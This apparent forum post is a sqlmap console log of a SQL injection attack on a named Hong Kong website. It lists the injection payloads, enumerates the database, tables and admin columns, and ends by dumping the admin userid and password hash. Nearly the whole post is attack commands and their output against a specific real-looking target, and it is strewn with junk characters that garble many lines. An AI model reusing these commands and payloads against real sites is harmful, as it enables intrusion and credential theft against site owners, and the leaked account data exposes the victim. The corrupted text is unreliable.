D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 b$ |% q" ?9 Q3 ^
ms "Mysql" --current-user /* 注解:获取当前用户名称
K, G9 U# i' f7 g: f' U- Q/ J sqlmap/0.9 - automatic SQL injection and database takeover tool
' ^3 P: ^2 c9 h3 X0 L; }5 H http://sqlmap.sourceforge.net starting at: 16:53:54; n0 k$ c4 X: d; x
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: m+ ~! G# ]# T6 u, T2 C- _0 o) r session file, [# {3 ]6 H! v0 p) N) J4 t
[16:53:54] [INFO] resuming injection data from session file
* E k5 c, y# S5 @[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
9 Z$ k" Q; N0 \ W% R1 V- m) L7 o& S[16:53:54] [INFO] testing connection to the target url% F. ?5 `- S* G
sqlmap identified the following injection points with a total of 0 HTTP(s) reque5 L' ]5 b* \8 c4 b
sts:
9 I' `! U' h2 ~# @---! ?- }4 V2 v6 z6 o
Place: GET
/ _, w. z0 V% a" r" {: v& RParameter: id
8 b4 k: M& d6 Y/ Z% z+ X) x Type: boolean-based blind
P$ f4 t0 l' r/ L Title: AND boolean-based blind - WHERE or HAVING clause# S9 H0 j6 t$ [$ |' Q$ [
Payload: id=276 AND 799=799) C6 a$ M! V9 e/ j7 Q) P* T
Type: error-based
& Z( I2 M# Y) g0 T; A v4 K Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. [' y$ `+ M, a8 t Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 A' e% n4 ]7 L" a; U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 x% W& t* r$ v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# @) s6 {( z. `9 E
Type: UNION query
! c. N' A5 Y! W6 A- F! H; D; i; e. P Title: MySQL UNION query (NULL) - 1 to 10 columns
- d- y" `; B( s, F: R8 L/ n* l Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) h/ t1 N/ W4 m' o. ?& ~; V1 B
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, y% J, z4 u% `- z" a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 S- d% H# O7 Q, X
Type: AND/OR time-based blind: `0 v* S m0 p6 P+ _
Title: MySQL > 5.0.11 AND time-based blind
& i) P, M$ N( J4 N Payload: id=276 AND SLEEP(5)
' z$ T2 H* C* M; U: o" q$ o% d/ v9 c/ l---
3 I2 m$ Q: _5 G[16:53:55] [INFO] the back-end DBMS is MySQL
- O8 A3 Y& K" ?+ P* L; pweb server operating system: Windows, C5 {( J. z; A1 W F ^3 T
web application technology: Apache 2.2.11, PHP 5.3.0
8 V: z, X/ Q- }' j$ w+ J/ Mback-end DBMS: MySQL 5.0
8 ^/ k! l# O" @[16:53:55] [INFO] fetching current user P, U0 \3 ^2 x' t( r5 A
current user: 'root@localhost'
( i+ w" @! r6 ^8 y' p[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou5 a+ g; A% A' |5 q/ Z9 D& ~
tput\www.wepost.com.hk' shutting down at: 16:53:58
7 ~" Z5 V0 W& `( s+ F" z6 m- ?3 ]6 X, e g
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- r Y- i H" N4 i+ yms "Mysql" --current-db /*当前数据库& v" R* M0 E& |9 J- j: T: T
sqlmap/0.9 - automatic SQL injection and database takeover tool- p8 f$ E% S1 K; r2 V% q* g
http://sqlmap.sourceforge.net starting at: 16:54:169 @# ~) t/ j, \2 R% I5 L' t
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% G* E/ e- o/ n4 V% a session file
n$ C: a8 l0 F0 C5 \[16:54:16] [INFO] resuming injection data from session file9 L5 f% l0 K9 l) M9 W) e
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 m3 V8 o: P! c, H; I6 S. U1 A) K[16:54:16] [INFO] testing connection to the target url) U# s, v) |3 E0 m3 i
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" x9 F* I- F2 ~7 B8 y
sts:
$ j$ K+ i* o0 h {---7 u* I% p# a- T: f9 s
Place: GET
7 G9 N5 P2 P; A( ?& JParameter: id& w2 r+ n( ]) _
Type: boolean-based blind
+ t- Q) X* l2 \% T5 o4 R Title: AND boolean-based blind - WHERE or HAVING clause
# ]: |5 B' l8 q$ L/ M+ x Payload: id=276 AND 799=799' T& K: @) A! V- r2 k) m
Type: error-based
1 D2 P: n+ N# A: g& s6 l Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ W& \4 P3 l# b& k' T. M8 l) E8 H
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ X; `9 |# H5 Q9 D. C+ m
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ T+ @" e3 a% D$ `; }/ @( H+ n; k* g$ Q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
' L g# g& [, @: \: Y Type: UNION query
6 J! N' I3 @3 n O! E Title: MySQL UNION query (NULL) - 1 to 10 columns1 d0 M5 b2 b( [, `. A
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 T j5 n( R9 s9 F0 |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( X/ G$ T. q) L% H# k% ^
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ l& n/ M! E3 W" U2 e
Type: AND/OR time-based blind
3 `# }; R5 o* _- W7 @ Title: MySQL > 5.0.11 AND time-based blind a4 U4 Y9 @: d6 X$ u' x" r& Q' V5 j
Payload: id=276 AND SLEEP(5)0 c; a a3 o6 ^% [ H, }
---
3 A+ C( U: G. P, Y9 Q' D. Y[16:54:17] [INFO] the back-end DBMS is MySQL
9 Q" Q! ?$ c* K; x9 sweb server operating system: Windows3 ?* a0 ?- u" Y/ O P
web application technology: Apache 2.2.11, PHP 5.3.0 `/ z# ?) Y' ^( d; N* z5 Y! X8 u1 ?
back-end DBMS: MySQL 5.0
3 x4 X# Q: Q+ T: o/ [[16:54:17] [INFO] fetching current database
+ I o+ q p; y, a" c; A$ Y% ucurrent database: 'wepost'
! _" ?; K) z2 U* s9 P, K[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
4 K \4 ?) h. }6 M- f4 xtput\www.wepost.com.hk' shutting down at: 16:54:18
! r' r; i* [" J8 j5 X( ~) d- u6 ND:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. z' p# s2 T$ Bms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
1 `+ Y& L" U& P$ r9 d- o1 U3 A: w sqlmap/0.9 - automatic SQL injection and database takeover tool
. u1 R' D5 b( \- L+ A http://sqlmap.sourceforge.net starting at: 16:55:25
; F8 b: ^# \/ C- H$ y" W[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' ~4 O. u8 F6 a4 w% c# j7 ]
session file1 H& j' \* R% W+ e! U
[16:55:25] [INFO] resuming injection data from session file. Z3 K$ L; T4 J" J% c7 b) K: L6 L% K
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ ]( z# m; w1 D5 Y# t6 F3 G; @! O[16:55:25] [INFO] testing connection to the target url
2 i% |3 N: n3 C$ L {8 Ksqlmap identified the following injection points with a total of 0 HTTP(s) reque
[- ]' c# m/ f0 w/ W& d% osts:
! \- M5 F# t! Y5 Y( d---
" F) x, s% s' M' nPlace: GET2 g( w1 O2 I$ U! S! H
Parameter: id1 n' D1 f1 q+ _' H- j
Type: boolean-based blind; p9 u, ?5 ?2 K5 y
Title: AND boolean-based blind - WHERE or HAVING clause
7 @* }9 V3 b* X0 C# o Payload: id=276 AND 799=799, b; W" u6 F: [5 M- y1 ~ }
Type: error-based
" _: h, d& N6 q5 G. T Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 y; [9 f- Z$ s; M
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' W6 w9 N2 ?5 A3 z1 F5 G
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
' H( J$ C& }7 o8 k- @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- N" \! s0 N* ^ Type: UNION query
+ H3 w. G' x& J3 ?/ N6 ? Title: MySQL UNION query (NULL) - 1 to 10 columns0 g) i0 N+ ~% ^7 u/ z
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ j5 \3 s" ^$ _" Z B(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
) B1 e: O$ m5 X* l( w8 lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% y/ P: `* N* s/ h% T, r P# B
Type: AND/OR time-based blind) G6 n- Y9 p& `1 N! M8 I
Title: MySQL > 5.0.11 AND time-based blind" ^/ \& E8 D* S& W
Payload: id=276 AND SLEEP(5)1 S# y* `" @" z! ~: w
---
( {0 ?" K& R% `9 J& h[16:55:26] [INFO] the back-end DBMS is MySQL+ s6 o; r6 } m+ A# ?& i) C+ B
web server operating system: Windows
6 e2 L9 A' e* w# N: z1 Cweb application technology: Apache 2.2.11, PHP 5.3.0
% u7 |+ H" T" r7 _back-end DBMS: MySQL 5.0
- z# i) h6 `) P6 H: d[16:55:26] [INFO] fetching tables for database 'wepost'
. n, M8 d; L; a$ g- I3 D, B2 d[16:55:27] [INFO] the SQL query used returns 6 entries" T9 v' t# O! G
Database: wepost. m% }4 I) c2 [, t- L _
[6 tables]
9 x/ c/ P7 M* _+-------------+9 {! y1 P! w& ~3 E
| admin |+ o) X! F7 P) H
| article |( y0 \! z3 S- J! V
| contributor |
$ `: g6 ]# p) h" g5 _7 n/ O" w| idea |
; b& Z5 u4 t3 N1 ^0 f| image |
, O3 ^+ A. F* S$ ?| issue |
4 T6 \; H2 ]: X: a+-------------+
+ s, q) n' c6 S+ C6 W/ y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: f3 \3 V5 k8 E" t/ [3 R$ dtput\www.wepost.com.hk' shutting down at: 16:55:33* r& T, _8 g# c5 x
) q" D, t& w/ B( A& hD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- c& H2 ^ \& t7 }! N. n
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名5 f" a' M( E3 o) ]
sqlmap/0.9 - automatic SQL injection and database takeover tool
$ S, g% }+ d0 a s3 Y4 Y% h http://sqlmap.sourceforge.net starting at: 16:56:067 M9 I3 W6 D" _
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 x; G0 J! i- [+ v3 T) m
sts:
A7 {4 ~# y# e' \---
6 h+ o' {8 ^- {2 IPlace: GET' V4 Z: Q- b9 H- g: e% @8 ]
Parameter: id6 _" d# S" c- J& Q
Type: boolean-based blind
6 o" c7 Y8 f9 z: m Title: AND boolean-based blind - WHERE or HAVING clause
* G; _/ N+ K; m; R( W. L Payload: id=276 AND 799=799
; S! V) x* t# Y4 G1 T Type: error-based- \) G" a* P( k& l7 X' \9 `* I) U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ @+ c }/ w/ t6 _- J Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; e& }- G: S2 `" ] ~: a2 ]( N: L& X120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" C- N- g/ |# {% l Z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 @) @4 j' V% X2 a) O- z! R
Type: UNION query
0 m/ e' C5 e# c7 [8 R Title: MySQL UNION query (NULL) - 1 to 10 columns( N- |4 T& Y8 V- m+ e
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: S* @6 {) R6 E' L. s# R: C; [(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
1 {7 q% K: c' LCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& F# `7 R* O$ W: P/ o6 d0 l, z( a5 c Type: AND/OR time-based blind
% p* n3 x: H; s6 R, a6 P Title: MySQL > 5.0.11 AND time-based blind# y- {) [0 W/ G* {; v5 }
Payload: id=276 AND SLEEP(5)
% W, t& B: C' ]3 Y- X3 Y8 B8 R---
( H7 y$ |2 b# L9 W" I: F- q' ^web server operating system: Windows. F* U/ Q& P) E
web application technology: Apache 2.2.11, PHP 5.3.01 I7 f+ x; z0 Z0 | H$ s5 ^
back-end DBMS: MySQL 5.0
, ?$ d4 F- ?% [/ ]9 j[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se5 B. B8 A/ _+ ~
ssion': wepost, wepost u6 K, D7 v. h, [& g G+ q
Database: wepost
8 }7 K; I) z) ]0 |- t4 iTable: admin
! w' m7 V8 Q8 _9 J" V[4 columns]
# ?6 l/ y7 @% K2 ?5 W' C* `8 {+----------+-------------+' t8 o/ `$ z; o! c W# G
| Column | Type |* T+ R% v) B" b: u2 f
+----------+-------------+
; p0 C2 q7 r, |9 V& v+ Z1 _! l' Q| id | int(11) |
; K+ u2 e$ d3 G0 b) j) }: \2 N| password | varchar(32) |3 [' d! `) R2 n# ^! R- B2 ^4 j
| type | varchar(10) |% K/ o1 W" z2 H4 a% R, B
| userid | varchar(20) |
8 [ {+ F1 P; s# N6 W+----------+-------------+/ f0 {; ] Y( S! H& m9 H" C
shutting down at: 16:56:19
4 J! _! L% M t/ c) m
. U0 p" o q: P! {8 p& M7 F; L6 GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& u( Z. W( K/ k- r Ems "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
5 u# a+ D' L: ^' ] sqlmap/0.9 - automatic SQL injection and database takeover tool
7 x7 \# R; N6 P) I http://sqlmap.sourceforge.net starting at: 16:57:14
5 p1 T$ f& u0 Psqlmap identified the following injection points with a total of 0 HTTP(s) reque
9 w- V2 l; o# C( _& d0 wsts:1 @* _8 D' G( a. i; I/ F0 M
---
; w9 s/ X J- ZPlace: GET* S+ e+ Y2 \1 y5 q' U9 W9 l7 m
Parameter: id
. r* B0 R5 q# k) s" g z Type: boolean-based blind
1 W% b/ g, b+ _- ^6 Q: ? Title: AND boolean-based blind - WHERE or HAVING clause
s% w/ C5 C) i* l7 }5 \ Payload: id=276 AND 799=799" q/ {8 O. t! T: o
Type: error-based8 t8 f* {9 t; x1 f& E
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 N" N& ^2 y! E. C: A Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
% ~# m$ L" y9 ?, z( Z1 k4 S120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 C1 |6 j+ z' C: s* w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& X0 @% r' K$ W- Q* M9 `1 g+ u Type: UNION query
9 @# r7 Z7 w( V3 P; @3 O, w Title: MySQL UNION query (NULL) - 1 to 10 columns9 X* c3 p. c6 t5 t
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" C' I& Q7 f& [' t9 n(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 z ^7 P' @# {: I, F* G* lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 S& r7 j3 h S8 m. d2 y* p
Type: AND/OR time-based blind
7 ? h5 R6 y1 y1 N' q9 V Title: MySQL > 5.0.11 AND time-based blind# }1 @' V2 ]1 I) ]" L. r
Payload: id=276 AND SLEEP(5)% y1 n. s! |% F6 p, H
---' w) C% F, b! H4 Z
web server operating system: Windows/ a+ g$ s/ D$ R; p- }# ]: m
web application technology: Apache 2.2.11, PHP 5.3.0 R% _3 \* Z, k/ f |. c4 p" q
back-end DBMS: MySQL 5.0
2 b$ L( k. `/ F/ K- Q5 ]/ Q# s) srecognized possible password hash values. do you want to use dictionary attack o" H( f6 a$ S+ B/ \
n retrieved table items? [Y/n/q] y
" \3 g2 \# K U9 E! R+ u, Swhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
' f# }3 x/ p/ `do you want to use common password suffixes? (slow!) [y/N] y p5 q: y0 A5 q l% Q
Database: wepost' N6 ~5 ]7 A3 }" X$ P
Table: admin# q3 F. j& f) B: O/ }0 t
[1 entry]) k* u# S+ [* i# n o+ F
+----------------------------------+------------+
! O# Y$ I$ v3 v6 p5 i* w" b| password | userid |: {; H/ ? t* N: B# c- J' s# J
+----------------------------------+------------+, O: \3 a. F9 X4 P$ Y
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |: g! h0 t9 I. }7 N
+----------------------------------+------------+
; w2 X/ j& Q; q7 T9 I shutting down at: 16:58:14& Z2 ]3 ^( }- g" y
- ?+ i2 B8 E- Z, M8 xD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对